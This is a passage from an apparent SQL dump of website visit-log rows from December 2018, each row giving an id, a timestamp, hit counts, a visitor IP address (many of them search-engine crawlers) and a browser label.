148.186','other'),(353605,1545032645,1,1,0,0,'94.181.164.36','chrome'),(353606,1545032762,2,2,0,0,'95.163.255.103','other'),(353607,1545032791,2,2,0,0,'66.249.66.42','chrome'),(353608,1545032858,1,1,0,0,'54.36.149.105','other'),(353609,1545032979,1,1,0,0,'95.163.255.102','other'),(353610,1545033033,1,1,0,0,'5.45.207.19','other'),(353611,1545033079,1,1,0,0,'54.36.149.39','other'),(353612,1545033130,1,1,0,0,'95.163.255.106','other'),(353613,1545033147,1,1,0,0,'54.36.148.61','other'),(353614,1545033265,1,1,0,0,'95.163.255.107','other'),(353615,1545033287,1,1,0,0,'95.163.255.95','other'),(353616,1545033289,2,2,0,0,'95.163.255.96','other'),(353617,1545033290,2,2,0,0,'95.163.255.98','other'),(353618,1545033297,1,1,0,0,'95.163.255.97','other'),(353619,1545033307,1,1,0,0,'95.163.255.92','other'),(353620,1545033309,1,1,0,0,'95.163.255.93','other'),(353621,1545033378,1,1,0,0,'66.249.66.157','chrome'),(353622,1545033379,1,1,0,0,'66.249.66.154','chrome'),(353623,1545033392,1,1,0,0,'95.163.255.105','other'),(353624,1545033414,1,1,0,0,'8.29.198.25','other'),(353625,1545033610,1,1,0,0,'157.55.39.255','other'),(353626,1545033661,1,1,0,0,'54.36.149.80','other'),(353627,1545033687,2,2,0,0,'46.229.168.132','other'),(353628,1545033767,1,1,0,0,'8.29.198.27','other'),(353629,1545033788,1,1,0,0,'54.36.148.253','other'),(353630,1545033907,2,2,0,0,'91.196.178.67','chrome'),(353631,1545034202,1,1,0,0,'46.229.168.130','other'),(353632,1545034378,2,2,0,0,'66.249.66.155','chrome'),(353633,1545034379,2,2,0,0,'66.249.66.156','chrome'),(353634,1545034492,1,1,0,0,'95.163.255.168','other'),(353635,1545034495,1,1,0,0,'95.163.255.170','other'),(353636,1545034696,1,1,0,0,'54.36.149.84','other'),(353637,1545034779,2,2,0,0,'66.249.66.154','chrome'),(353638,1545034828,1,1,0,0,'66.249.66.218','chrome'),(353639,1545034848,3,3,0,0,'66.249.66.40','chrome'),(353640,1545035052,3,3,0,0,'91.196.178.65','chrome'),(353641,1545035194,3,3,0,0,'66.249.66.152','chrome'),(353642,1545035338,1,1,0,0,'178.154.244.11','other'),(353643,1545035340,1,1,0,0,'54.165.59.7','other'),(353644,1545035428,1,1,0,0,'66.249.66.44','chrome'),(353645,1545035641,1,1,0,0,'91.196.178.169','firefox'),(353646,1545035666,1,1,0,0,'66.249.66.156','chrome'),(353647,1545035683,2,2,0,0,'37.73.241.244','chrome'),(353648,1545035698,1,1,0,0,'40.77.167.176','other'),(353649,1545035706,1,1,0,0,'37.52.42.133','opera'),(353650,1545035811,1,1,0,0,'54.36.149.73','other'),(353651,1545035831,1,1,0,0,'54.36.149.64','other'),(353652,1545036304,1,1,0,0,'95.135.240.38','chrome'),(353653,1545036489,2,2,0,0,'66.249.66.152','chrome'),(353654,1545036571,1,1,0,0,'95.163.255.97','other'),(353655,1545036574,1,1,0,0,'95.163.255.99','other'),(353656,1545036625,1,1,0,0,'46.229.168.130','other'),(353657,1545036643,1,1,0,0,'54.36.148.223','other'),(353658,1545036710,1,1,0,0,'54.36.148.237','other'),(353659,1545036737,1,1,0,0,'212.129.61.200','firefox'),(353660,1545036783,3,3,0,0,'66.249.66.156','chrome'),(353661,1545036827,2,2,0,0,'66.249.66.42','chrome'),(353662,1545036988,1,1,0,0,'66.249.66.154','chrome'),(353663,1545036995,1,1,0,0,'66.249.66.155','chrome'),(353664,1545037163,1,1,0,0,'54.36.148.115','other'),(353665,1545037232,1,1,0,0,'46.229.168.140','other'),(353666,1545037243,2,2,0,0,'91.196.178.90','firefox'),(353667,1545037594,4,4,0,0,'91.196.179.134','chrome'),(353668,1545037729,1,1,0,0,'54.36.148.24','other'),(353669,1545037845,1,1,0,0,'54.36.148.229','other'),(353670,1545037928,1,1,0,0,'37.54.44.125','chrome'),(353671,1545037967,1,1,0,0,'54.36.148.16','other'),(353672,1545038085,2,2,0,0,'91.196.178.90','chrome'),(353673,1545038253,1,1,0,0,'40.77.167.136','other'),(353674,1545038391,1,1,0,0,'54.36.148.59','other'),(353675,1545038627,1,1,0,0,'54.36.148.121','other'),(353676,1545038784,2,2,0,0,'37.73.187.51','chrome'),(353677,1545038824,1,1,0,0,'54.36.148.66','other'),(353679,1545039061,50,50,0,0,'34.228.30.69','other'),(353680,1545039076,2,2,0,0,'66.249.66.156','chrome'),(353681,1545039296,1,1,0,0,'46.229.168.136','other'),(353682,1545039443,1,1,0,0,'5.58.39.107','msie'),(353683,1545039476,1,1,0,0,'5.45.207.79','other'),(353684,1545039802,2,2,0,0,'91.196.178.67','chrome'),(353685,1545039952,1,1,0,0,'95.135.240.38','chrome'),(353686,1545039969,30,30,0,0,'34.228.30.69','other'),(353687,1545040090,1,1,0,0,'66.249.66.59','chrome'),(353688,1545040091,1,1,0,0,'66.249.66.40','chrome'),(353689,1545040173,1,1,0,0,'46.229.168.154','other'),(353690,1545040174,1,1,0,0,'46.229.168.129','other'),(353691,1545040181,1,1,0,0,'54.36.149.5','other'),(353692,1545040369,1,1,0,0,'66.249.66.156','chrome'),(353693,1545040771,3,3,0,0,'91.196.178.67','chrome'),(353694,1545040802,4,4,0,0,'91.196.179.134','chrome'),(353695,1545040813,1,1,0,0,'54.36.148.81','other'),(353696,1545040830,1,1,0,0,'66.249.66.44','chrome'),(353697,1545040953,22,22,0,0,'34.228.30.69','other'),(353698,1545040972,1,1,0,0,'66.249.66.152','chrome'),(353699,1545040979,2,2,0,0,'82.207.98.35','chrome'),(353700,1545041072,1,1,0,0,'54.36.148.165','other'),(353701,1545041092,2,2,0,0,'66.249.66.154','chrome'),(353702,1545041339,13,13,0,0,'5.9.156.30','other'),(353703,1545041490,2,2,0,0,'91.196.178.84','firefox'),(353704,1545041599,1,1,0,0,'54.36.148.96','other'),(353705,1545041771,1,1,0,0,'54.36.149.45','other'),(353706,1545041828,2,2,0,0,'95.163.255.93','other'),(353707,1545041891,2,2,0,0,'66.249.66.156','chrome'),(353708,1545041983,30,30,0,0,'34.228.30.69','other'),(353709,1545042072,1,1,0,0,'54.36.148.137','other'),(353710,1545042262,1,1,0,0,'46.229.168.154','other'),(353711,1545042263,1,1,0,0,'111.202.101.78','other'),(353712,1545042272,1,1,0,0,'54.36.148.106','other'),(353713,1545043040,28,28,0,0,'34.228.30.69','other'),(353714,1545043297,1,1,0,0,'95.163.255.175','other'),(353715,1545043300,1,1,0,0,'95.163.255.162','other'),(353716,1545043325,1,1,0,0,'66.249.66.57','chrome'),(353717,1545043326,2,2,0,0,'66.249.66.40','chrome'),(353718,1545043381,1,1,0,0,'66.249.66.157','chrome'),(353719,1545043382,1,1,0,0,'66.249.66.152','chrome'),(353720,1545043412,2,2,0,0,'91.196.178.168','chrome'),(353721,1545043444,1,1,0,0,'66.249.66.61','chrome'),(353722,1545043481,1,1,0,0,'46.229.168.135','other'),(353723,1545043739,1,1,0,0,'54.36.149.18','other'),(353724,1545043987,1,1,0,0,'54.36.148.126','other'),(353725,1545044000,26,26,0,0,'34.228.30.69','other'),(353726,1545044032,1,1,0,0,'66.249.66.42','chrome'),(353727,1545044251,2,2,0,0,'8.29.198.27','other'),(353728,1545044334,1,1,0,0,'66.249.66.59','chrome'),(353729,1545044344,1,1,0,0,'66.249.66.44','chrome'),(353730,1545044470,1,1,0,0,'66.249.66.195','chrome'),(353731,1545044471,2,2,0,0,'66.249.66.152','chrome'),(353732,1545044552,1,1,0,0,'91.196.178.168','chrome'),(353733,1545044560,1,1,0,0,'54.36.148.50','other'),(353734,1545044647,1,1,0,0,'66.249.66.154','chrome'),(353735,1545044690,1,1,0,0,'66.249.66.155','chrome'),(353736,1545044712,1,1,0,0,'66.249.66.156','chrome'),(353737,1545044821,1,1,0,0,'46.229.168.139','other'),(353738,1545044964,1,1,0,0,'207.46.13.109','other'),(353739,1545045085,14,14,0,0,'34.228.30.69','other'),(353740,1545045091,1,1,0,0,'54.36.149.58','other'),(353741,1545045473,1,1,0,0,'54.36.148.223','other'),(353742,1545045487,3,3,0,0,'66.249.66.40','chrome'),(353743,1545045580,1,1,0,0,'66.249.66.152','chrome'),(353744,1545045644,1,1,0,0,'178.154.244.11','other'),(353745,1545045689,1,1,0,0,'54.36.148.184','other'),(353746,1545045950,1,1,0,0,'54.36.148.163','other'),(353747,1545046147,49,49,0,0,'46.4.67.206','other'),(353748,1545046191,1,1,0,0,'54.36.148.112','other'),(353749,1545046521,1,1,0,0,'66.249.66.40','chrome'),(353750,1545046891,1,1,0,0,'95.108.181.54','other'),(353751,1545046900,2,2,0,0,'87.250.224.47','other'),(353752,1545046965,1,1,0,0,'157.55.39.215','other'),(353753,1545047069,3,3,0,0,'5.45.207.79','other'),(353754,1545047152,1,1,0,0,'141.8.142.103','other'),(353755,1545047299,6,6,0,0,'5.45.207.19','other'),(353756,1545047464,1,1,0,0,'54.36.148.54','other'),(353757,1545047493,2,2,0,0,'66.249.66.156','chrome'),(353758,1545047494,3,3,0,0,'66.249.66.152','chrome'),(353759,1545047608,1,1,0,0,'54.36.148.199','other'),(353760,1545047620,1,1,0,0,'54.36.149.95','other'),(353761,1545047636,1,1,0,0,'176.120.62.237','chrome'),(353762,1545047649,1,1,0,0,'66.249.66.61','chrome'),(353763,1545047658,2,2,0,0,'178.154.244.11','other'),(353764,1545047800,1,1,0,0,'95.163.255.93','other'),(353765,1545047803,1,1,0,0,'95.163.255.99','other'),(353766,1545047904,1,1,0,0,'66.249.66.218','chrome'),(353767,1545048060,3,3,0,0,'5.45.207.79','other'),(353768,1545048287,1,1,0,0,'141.8.142.103','other'),(353769,1545048400,1,1,0,0,'66.249.66.57','chrome'),(353771,1545048485,1,1,0,0,'54.36.149.75','other'),(353772,1545048598,1,1,0,0,'46.229.168.150','other'),(353773,1545048993,1,1,0,0,'87.250.224.47','other'),(353774,1545049022,1,1,0,0,'95.163.255.190','other'),(353775,1545049023,4,4,0,0,'5.45.207.79','other'),(353776,1545049025,1,1,0,0,'95.163.255.152','other'),(353777,1545049202,2,2,0,0,'5.45.207.19','other'),(353778,1545049240,1,1,0,0,'141.8.142.103','other'),(353779,1545049634,2,2,0,0,'66.249.66.44','chrome'),(353780,1545049799,1,1,0,0,'66.249.66.40','chrome'),(353781,1545049854,1,1,0,0,'66.249.66.42','chrome'),(353782,1545049964,1,1,0,0,'54.36.149.15','other'),(353783,1545050016,1,1,0,0,'130.180.211.130','opera'),(353784,1545050077,1,1,0,0,'66.249.66.155','chrome'),(353785,1545050078,1,1,0,0,'66.249.66.152','chrome'),(353786,1545050124,1,1,0,0,'54.36.148.43','other'),(353787,1545050129,2,2,0,0,'95.132.185.215','chrome'),(353788,1545050619,1,1,0,0,'66.249.66.57','chrome'),(353789,1545050620,1,1,0,0,'66.249.66.44','chrome'),(353790,1545050642,1,1,0,0,'54.36.149.37','other'),(353791,1545050657,1,1,0,0,'5.58.78.201','chrome'),(353792,1545050734,1,1,0,0,'91.196.178.168','chrome'),(353793,1545050833,1,1,0,0,'5.45.207.79','other'),(353794,1545051037,1,1,0,0,'176.9.9.92','other'),(353795,1545051233,1,1,0,0,'66.249.66.61','chrome'),(353796,1545051294,1,1,0,0,'54.36.148.223','other'),(353797,1545051466,2,2,0,0,'91.196.178.67','chrome'),(353798,1545051482,2,2,0,0,'91.196.178.84','firefox'),(353799,1545051511,1,1,0,0,'46.119.121.84','chrome'),(353800,1545051579,1,1,0,0,'77.120.186.33','chrome'),(353801,1545051993,2,2,0,0,'66.249.66.152','chrome'),(353802,1545052121,1,1,0,0,'46.229.168.154','other'),(353803,1545052148,2,2,0,0,'66.249.66.44','chrome'),(353804,1545052242,5,5,0,0,'66.249.66.154','chrome'),(353805,1545052335,1,1,0,0,'54.36.148.52','other'),(353806,1545052411,1,1,0,0,'66.249.66.155','chrome'),(353807,1545052500,2,2,0,0,'91.196.178.67','chrome'),(353808,1545052597,1,1,0,0,'54.36.148.226','other'),(353809,1545052680,1,1,0,0,'54.36.148.40','other'),(353810,1545052682,1,1,0,0,'54.36.149.2','other'),(353811,1545052700,3,3,0,0,'213.160.151.210','chrome'),(353812,1545052741,1,1,0,0,'54.36.148.231','other'),(353813,1545052888,1,1,0,0,'66.249.66.156','chrome'),(353814,1545052976,2,2,0,0,'95.163.255.97','other'),(353815,1545052977,1,1,0,0,'95.163.255.175','other'),(353816,1545052979,1,1,0,0,'95.163.255.92','other'),(353817,1545052980,1,1,0,0,'95.163.255.168','other'),(353818,1545053051,1,1,0,0,'54.36.149.10','other'),(353819,1545053209,1,1,0,0,'66.249.66.152','chrome'),(353820,1545053240,1,1,0,0,'46.229.168.141','other'),(353821,1545053462,1,1,0,0,'95.163.255.98','other'),(353822,1545053495,1,1,0,0,'95.163.255.95','other'),(353823,1545053496,1,1,0,0,'95.163.255.94','other'),(353824,1545053498,2,2,0,0,'95.163.255.99','other'),(353825,1545053587,1,1,0,0,'46.211.52.35','chrome'),(353826,1545053628,1,1,0,0,'54.36.149.4','other'),(353827,1545053829,2,2,0,0,'91.196.179.134','chrome'),(353828,1545053845,1,1,0,0,'54.36.148.233','other'),(353829,1545053966,2,2,0,0,'91.196.178.182','chrome'),(353830,1545053986,2,2,0,0,'159.253.145.183','firefox'),(353831,1545054624,1,1,0,0,'66.249.66.42','chrome'),(353832,1545054702,2,2,0,0,'66.249.66.154','chrome'),(353833,1545054889,1,1,0,0,'54.36.148.30','other'),(353834,1545055091,1,1,0,0,'8.29.198.27','other'),(353836,1545055268,1,1,0,0,'54.36.149.80','other'),(353837,1545055273,2,2,0,0,'91.196.178.67','chrome'),(353838,1545055373,1,1,0,0,'66.249.66.40','chrome'),(353839,1545055445,1,1,0,0,'8.29.198.26','other'),(353840,1545055569,1,1,0,0,'54.36.148.83','other'),(353841,1545055675,2,2,0,0,'66.249.66.157','chrome'),(353842,1545055676,2,2,0,0,'66.249.66.152','chrome'),(353843,1545055787,2,2,0,0,'66.249.66.44','chrome'),(353844,1545055834,1,1,0,0,'54.36.148.169','other'),(353845,1545055949,1,1,0,0,'54.36.148.191','other'),(353846,1545056012,1,1,0,0,'178.154.244.11','other'),(353847,1545056013,1,1,0,0,'5.45.207.19','other'),(353849,1545056014,1,1,0,0,'5.45.207.79','other'),(353852,1545056283,1,1,0,0,'54.36.148.62','other'),(353853,1545056304,1,1,0,0,'46.229.168.132','other'),(353854,1545056381,1,1,0,0,'37.52.150.144','chrome'),(353855,1545056728,1,1,0,0,'66.249.66.156','chrome'),(353856,1545056803,1,1,0,0,'95.163.255.153','other'),(353857,1545056806,1,1,0,0,'95.163.255.175','other'),(353858,1545056849,1,1,0,0,'46.229.168.142','other'),(353859,1545056876,1,1,0,0,'54.36.149.25','other'),(353860,1545056901,1,1,0,0,'207.46.13.34','other'),(353861,1545056959,1,1,0,0,'54.36.148.197','other'),(353862,1545056987,1,1,0,0,'54.36.148.128','other'),(353863,1545057125,1,1,0,0,'66.249.66.152','chrome'),(353864,1545057148,2,2,0,0,'66.249.66.40','chrome'),(353865,1545057258,1,1,0,0,'207.46.13.196','other'),(353866,1545057322,1,1,0,0,'207.46.13.54','other'),(353867,1545057405,1,1,0,0,'66.249.66.157','chrome'),(353868,1545057794,1,1,0,0,'91.196.178.168','chrome'),(353869,1545058124,1,1,0,0,'54.36.148.79','other'),(353870,1545058182,1,1,0,0,'91.196.178.45','chrome'),(353871,1545058472,1,1,0,0,'66.249.66.40','chrome'),(353872,1545058542,1,1,0,0,'66.249.66.44','chrome'),(353873,1545058806,4,4,0,0,'66.249.66.154','chrome'),(353874,1545058819,1,1,0,0,'54.36.148.149','other'),(353875,1545059043,1,1,0,0,'213.180.203.9','other'),(353876,1545059058,7,7,0,0,'95.108.213.4','other'),(353877,1545059061,1,1,0,0,'54.36.148.205','other'),(353878,1545059079,2,2,0,0,'66.249.66.218','chrome'),(353879,1545059089,3,3,0,0,'5.45.207.19','other'),(353880,1545059114,1,1,0,0,'95.163.255.94','other'),(353881,1545059115,2,2,0,0,'95.163.255.98','other'),(353882,1545059120,1,1,0,0,'95.163.255.97','other'),(353883,1545059136,1,1,0,0,'66.249.66.156','chrome'),(353884,1545059137,1,1,0,0,'66.249.66.152','chrome'),(353885,1545059196,4,4,0,0,'141.8.142.103','other'),(353886,1545059335,4,4,0,0,'5.45.207.79','other'),(353887,1545059410,1,1,0,0,'78.111.177.23','chrome'),(353888,1545059420,1,1,0,0,'87.250.224.47','other'),(353889,1545059452,10,10,0,0,'178.154.244.11','other'),(353890,1545059482,1,1,0,0,'141.8.132.16','other'),(353891,1545059524,1,1,0,0,'178.154.171.17','other'),(353892,1545059593,1,1,0,0,'95.163.255.185','other'),(353893,1545059597,1,1,0,0,'95.163.255.188','other'),(353894,1545059896,2,2,0,0,'5.255.253.38','other'),(353895,1545060008,3,3,0,0,'37.9.113.148','other'),(353896,1545060032,4,4,0,0,'95.108.213.4','other'),(353897,1545060153,1,1,0,0,'95.163.255.181','other'),(353898,1545060158,1,1,0,0,'95.163.255.180','other'),(353899,1545060160,3,3,0,0,'141.8.142.103','other'),(353900,1545060231,1,1,0,0,'66.249.66.156','chrome'),(353901,1545060282,3,3,0,0,'5.45.207.79','other'),(353902,1545060299,1,1,0,0,'54.36.148.224','other'),(353903,1545060347,1,1,0,0,'141.8.142.108','other'),(353904,1545060540,1,1,0,0,'54.36.148.190','other'),(353905,1545060561,3,3,0,0,'37.9.113.20','other'),(353906,1545060676,3,3,0,0,'5.45.207.8','other'),(353907,1545060703,1,1,0,0,'213.180.203.40','other'),(353908,1545060729,3,3,0,0,'141.8.142.38','other'),(353909,1545060772,2,2,0,0,'87.250.224.65','other'),(353910,1545060807,1,1,0,0,'66.249.66.155','chrome'),(353911,1545060808,1,1,0,0,'66.249.66.154','chrome'),(353912,1545060967,4,4,0,0,'37.9.113.148','other'),(353913,1545060984,2,2,0,0,'207.46.13.109','other'),(353914,1545061051,1,1,0,0,'66.249.66.40','chrome'),(353915,1545061104,2,2,0,0,'185.234.218.42','msie'),(353916,1545061135,2,2,0,0,'95.108.181.75','other'),(353917,1545061183,2,2,0,0,'95.163.255.92','other'),(353918,1545061304,2,2,0,0,'87.250.224.118','other'),(353919,1545061314,1,1,0,0,'54.36.148.181','other'),(353920,1545061315,1,1,0,0,'141.8.142.81','other'),(353921,1545061397,1,1,0,0,'54.165.59.7','other'),(353922,1545061493,2,2,0,0,'87.250.224.47','other'),(353923,1545061548,1,1,0,0,'54.36.148.142','other'),(353924,1545061661,1,1,0,0,'37.9.113.20','other'),(353925,1545061828,1,1,0,0,'66.249.66.156','chrome'),(353926,1545061842,3,3,0,0,'5.45.207.8','other'),(353927,1545062010,2,2,0,0,'130.180.219.103','chrome'),(353928,1545062092,3,3,0,0,'66.249.66.154','chrome'),(353929,1545062205,1,1,0,0,'54.36.148.223','other'),(353930,1545062435,1,1,0,0,'46.229.168.154','other'),(353931,1545062816,1,1,0,0,'66.249.66.157','chrome'),(353932,1545062817,1,1,0,0,'66.249.66.152','chrome'),(353933,1545063087,1,1,0,0,'46.229.168.140','other'),(353934,1545063089,1,1,0,0,'46.229.168.141','other'),(353935,1545063106,2,2,0,0,'66.249.66.155','chrome'),(353936,1545063107,2,2,0,0,'66.249.66.156','chrome'),(353937,1545063150,1,1,0,0,'54.36.148.133','other'),(353938,1545063247,1,1,0,0,'54.36.149.41','other'),(353939,1545063350,1,1,0,0,'54.36.148.109','other'),(353940,1545063444,1,1,0,0,'66.249.66.40','chrome'),(353941,1545063558,1,1,0,0,'95.163.255.184','other'),(353942,1545063560,1,1,0,0,'95.163.255.176','other'),(353943,1545063658,1,1,0,0,'207.46.13.54','other'),(353944,1545063778,1,1,0,0,'54.36.148.252','other'),(353945,1545063946,2,2,0,0,'66.249.66.154','chrome'),(353946,1545064027,1,1,0,0,'54.36.148.241','other'),(353947,1545064168,1,1,0,0,'176.120.100.231','msie'),(353948,1545064247,2,2,0,0,'95.163.255.98','other'),(353949,1545064249,1,1,0,0,'95.163.255.95','other'),(353950,1545064286,1,1,0,0,'66.249.66.156','chrome'),(353951,1545064358,1,1,0,0,'54.36.148.21','other'),(353952,1545064438,1,1,0,0,'54.36.148.195','other'),(353953,1545064622,2,2,0,0,'66.249.66.152','chrome'),(353954,1545064687,1,1,0,0,'40.77.167.170','other'),(353955,1545064793,1,1,0,0,'54.36.148.213','other'),(353956,1545064818,1,1,0,0,'40.77.167.32','other'),(353957,1545064849,1,1,0,0,'95.163.255.96','other'),(353958,1545065127,1,1,0,0,'207.46.13.109','other'),(353959,1545065222,1,1,0,0,'54.36.149.9','other'),(353960,1545065484,1,1,0,0,'95.163.255.187','other'),(353961,1545065488,1,1,0,0,'95.163.255.181','other'),(353962,1545065489,2,2,0,0,'66.249.66.156','chrome'),(353963,1545065490,3,3,0,0,'66.249.66.154','chrome'),(353964,1545065741,2,2,0,0,'66.249.66.152','chrome'),(353965,1545065769,1,1,0,0,'95.163.255.162','other'),(353966,1545065771,1,1,0,0,'95.163.255.164','other'),(353967,1545065929,1,1,0,0,'8.29.198.25','other'),(353968,1545066054,1,1,0,0,'46.229.168.150','other'),(353969,1545066239,1,1,0,0,'95.163.255.169','other'),(353970,1545066241,1,1,0,0,'95.163.255.160','other'),(353971,1545066284,1,1,0,0,'8.29.198.26','other'),(353972,1545066734,1,1,0,0,'66.249.66.44','chrome'),(353973,1545066753,1,1,0,0,'46.166.186.210','other'),(353974,1545066766,1,1,0,0,'95.163.255.97','other'),(353975,1545066769,1,1,0,0,'95.163.255.93','other'),(353976,1545066797,1,1,0,0,'95.163.255.94','other'),(353977,1545066799,1,1,0,0,'95.163.255.99','other'),(353978,1545067346,1,1,0,0,'66.249.66.155','chrome'),(353979,1545067366,1,1,0,0,'66.249.66.152','chrome'),(353980,1545067580,1,1,0,0,'66.249.66.156','chrome'),(353981,1545067599,1,1,0,0,'91.245.111.136','opera'),(353982,1545067805,1,1,0,0,'66.249.66.42','chrome'),(353983,1545068009,1,1,0,0,'178.154.244.11','other'),(353984,1545068037,48,48,0,0,'5.9.70.72','other'),(353985,1545068042,1,1,0,0,'66.249.66.157','chrome'),(353986,1545068086,1,1,0,0,'5.45.207.19','other'),(353987,1545068152,1,1,0,0,'54.36.148.173','other'),(353988,1545068271,1,1,0,0,'66.249.66.154','chrome'),(353989,1545068546,1,1,0,0,'66.249.66.44','chrome'),(353990,1545068727,1,1,0,0,'176.120.100.231','msie'),(353991,1545068909,2,2,0,0,'91.196.178.83','firefox'),(353992,1545068962,1,1,0,0,'66.249.66.152','chrome'),(353993,1545068989,2,2,0,0,'178.154.244.11','other'),(353994,1545068994,1,1,0,0,'87.250.224.47','other'),(353995,1545068996,1,1,0,0,'40.77.167.55','other'),(353996,1545069166,1,1,0,0,'54.36.149.55','other'),(353997,1545069493,1,1,0,0,'54.36.148.220','other'),(353998,1545069526,1,1,0,0,'54.36.148.225','other'),(353999,1545069606,4,4,0,0,'66.249.66.156','chrome'),(354000,1545069652,2,2,0,0,'66.249.66.154','chrome'),(354001,1545069712,4,4,0,0,'116.255.176.129','msie'),(354002,1545069818,1,1,0,0,'95.163.255.172','other'),(354003,1545069821,1,1,0,0,'95.163.255.180','other'),(354004,1545069855,1,1,0,0,'66.249.66.44','chrome'),(354005,1545069881,2,2,0,0,'66.249.66.152','chrome'),(354006,1545069976,1,1,0,0,'178.154.244.49','other'),(354007,1545070119,1,1,0,0,'40.77.167.55','other'),(354008,1545070149,1,1,0,0,'178.154.244.11','other'),(354009,1545070181,1,1,0,0,'66.249.66.157','chrome'),(354010,1545070243,1,1,0,0,'54.36.148.100','other'),(354011,1545070279,1,1,0,0,'178.154.171.27','other'),(354012,1545070462,1,1,0,0,'95.163.255.93','other'),(354013,1545070465,1,1,0,0,'95.163.255.95','other'),(354014,1545070551,1,1,0,0,'207.46.13.54','other'),(354015,1545070716,3,3,0,0,'66.249.66.154','chrome'),(354016,1545070990,1,1,0,0,'95.163.255.180','other'),(354017,1545070994,1,1,0,0,'95.163.255.162','other'),(354018,1545071019,1,1,0,0,'95.163.255.171','other'),(354019,1545071023,1,1,0,0,'95.163.255.168','other'),(354020,1545071035,1,1,0,0,'66.249.66.152','chrome'),(354021,1545071119,4,4,0,0,'66.249.66.156','chrome'),(354022,1545071122,1,1,0,0,'207.46.13.187','other'),(354023,1545071145,1,1,0,0,'66.249.66.42','chrome'),(354024,1545071426,1,1,0,0,'54.36.149.11','other'),(354025,1545071784,2,2,0,0,'66.249.66.157','chrome'),(354026,1545071785,2,2,0,0,'66.249.66.154','chrome'),(354027,1545071831,1,1,0,0,'54.36.149.20','other'),(354028,1545071904,1,1,0,0,'66.249.66.44','chrome'),(354029,1545072010,1,1,0,0,'91.245.111.136','msie'),(354030,1545072089,1,1,0,0,'91.213.33.174','firefox'),(354031,1545072106,1,1,0,0,'54.36.149.81','other'),(354032,1545072144,2,2,0,0,'91.209.11.236','other'),(354033,1545072232,1,1,0,0,'95.163.255.95','other'),(354034,1545072234,1,1,0,0,'95.163.255.98','other'),(354035,1545072389,1,1,0,0,'37.9.113.148','other'),(354036,1545072416,2,2,0,0,'5.45.207.19','other'),(354037,1545072454,2,2,0,0,'5.45.207.79','other'),(354038,1545072510,2,2,0,0,'37.9.113.20','other'),(354039,1545072572,4,4,0,0,'95.108.213.4','other'),(354040,1545072636,2,2,0,0,'37.9.113.103','other'),(354041,1545072780,2,2,0,0,'91.196.178.171','chrome'),(354042,1545072889,1,1,0,0,'54.36.149.8','other'),(354043,1545072901,2,2,0,0,'54.36.148.100','other'),(354044,1545072903,2,2,0,0,'87.250.224.47','other'),(354045,1545072947,3,3,0,0,'66.249.66.154','chrome'),(354046,1545073013,3,3,0,0,'178.154.244.11','other'),(354047,1545073196,2,2,0,0,'207.46.13.54','other'),(354048,1545073197,2,2,0,0,'141.8.142.103','other'),(354049,1545073413,1,1,0,0,'93.77.245.168','firefox'),(354050,1545073439,1,1,0,0,'5.45.207.79','other'),(354051,1545073639,1,1,0,0,'37.52.84.162','chrome'),(354052,1545073944,1,1,0,0,'54.36.149.56','other'),(354053,1545074144,1,1,0,0,'66.249.66.156','chrome'),(354054,1545074161,1,1,0,0,'5.45.207.19','other'),(354055,1545074341,1,1,0,0,'54.36.148.56','other'),(354056,1545074540,1,1,0,0,'95.163.255.69','other'),(354057,1545074543,1,1,0,0,'95.163.255.64','other'),(354058,1545074640,3,3,0,0,'66.249.66.152','chrome'),(354059,1545074684,1,1,0,0,'95.163.255.197','other'),(354060,1545074689,1,1,0,0,'95.163.255.196','other'),(354061,1545074934,1,1,0,0,'66.249.66.157','chrome'),(354062,1545075100,1,1,0,0,'5.45.207.19','other'),(354063,1545075582,2,2,0,0,'95.163.255.62','other'),(354064,1545075868,1,1,0,0,'37.73.54.23','chrome'),(354065,1545076098,1,1,0,0,'95.163.255.96','other'),(354066,1545076101,1,1,0,0,'95.163.255.99','other'),(354067,1545076139,1,1,0,0,'66.249.66.155','chrome'),(354068,1545076140,1,1,0,0,'66.249.66.156','chrome'),(354069,1545076227,1,1,0,0,'54.36.148.53','other'),(354070,1545076317,1,1,0,0,'54.36.148.164','other'),(354071,1545076433,1,1,0,0,'54.36.149.72','other'),(354072,1545076457,1,1,0,0,'54.36.148.211','other'),(354073,1545076478,1,1,0,0,'66.249.66.42','chrome'),(354074,1545076507,1,1,0,0,'209.17.97.2','other'),(354075,1545076557,1,1,0,0,'95.163.255.180','other'),(354076,1545076560,1,1,0,0,'95.163.255.195','other'),(354077,1545076561,1,1,0,0,'66.249.66.152','chrome'),(354078,1545076769,1,1,0,0,'130.180.210.236','chrome'),(354079,1545076773,1,1,0,0,'8.29.198.27','other'),(354080,1545077045,1,1,0,0,'178.255.215.94','other'),(354081,1545077119,1,1,0,0,'8.29.198.25','other'),(354082,1545077201,1,1,0,0,'91.196.178.100','chrome'),(354083,1545077230,1,1,0,0,'54.36.148.186','other'),(354084,1545077243,1,1,0,0,'54.36.149.89','other'),(354085,1545077252,1,1,0,0,'66.249.66.154','chrome'),(354086,1545077645,2,2,0,0,'40.77.167.82','other'),(354087,1545077678,1,1,0,0,'54.36.148.180','other'),(354088,1545077945,1,1,0,0,'95.163.255.96','other'),(354090,1545077948,1,1,0,0,'95.163.255.94','other'),(354091,1545078048,2,2,0,0,'66.249.66.156','chrome'),(354092,1545078140,1,1,0,0,'54.36.148.36','other'),(354093,1545078148,1,1,0,0,'66.249.66.152','chrome'),(354094,1545078533,1,1,0,0,'157.55.39.85','other'),(354095,1545078712,1,1,0,0,'66.249.66.44','chrome'),(354096,1545079091,1,1,0,0,'54.36.148.194','other'),(354097,1545079325,3,3,0,0,'66.249.66.156','chrome'),(354098,1545079327,2,2,0,0,'46.211.123.139','msie'),(354099,1545079453,1,1,0,0,'54.36.148.34','other'),(354100,1545079482,1,1,0,0,'46.229.168.141','other'),(354101,1545079724,2,2,0,0,'66.249.66.152','chrome'),(354102,1545079797,1,1,0,0,'54.36.148.142','other'),(354103,1545079799,1,1,0,0,'54.36.149.52','other'),(354104,1545079901,1,1,0,0,'54.36.148.137','other'),(354105,1545080129,1,1,0,0,'66.249.66.155','chrome'),(354107,1545080265,1,1,0,0,'54.36.148.215','other'),(354108,1545080294,1,1,0,0,'157.55.39.85','other'),(354109,1545080339,1,1,0,0,'54.36.149.61','other'),(354110,1545080546,1,1,0,0,'54.36.149.77','other'),(354111,1545080707,1,1,0,0,'66.249.66.154','chrome'),(354112,1545081155,1,1,0,0,'54.36.148.171','other'),(354113,1545081194,1,1,0,0,'95.163.255.168','other'),(354114,1545081200,1,1,0,0,'95.163.255.163','other'),(354115,1545081507,3,3,0,0,'66.249.66.155','chrome'),(354117,1545081525,1,1,0,0,'95.163.255.95','other'),(354118,1545081528,1,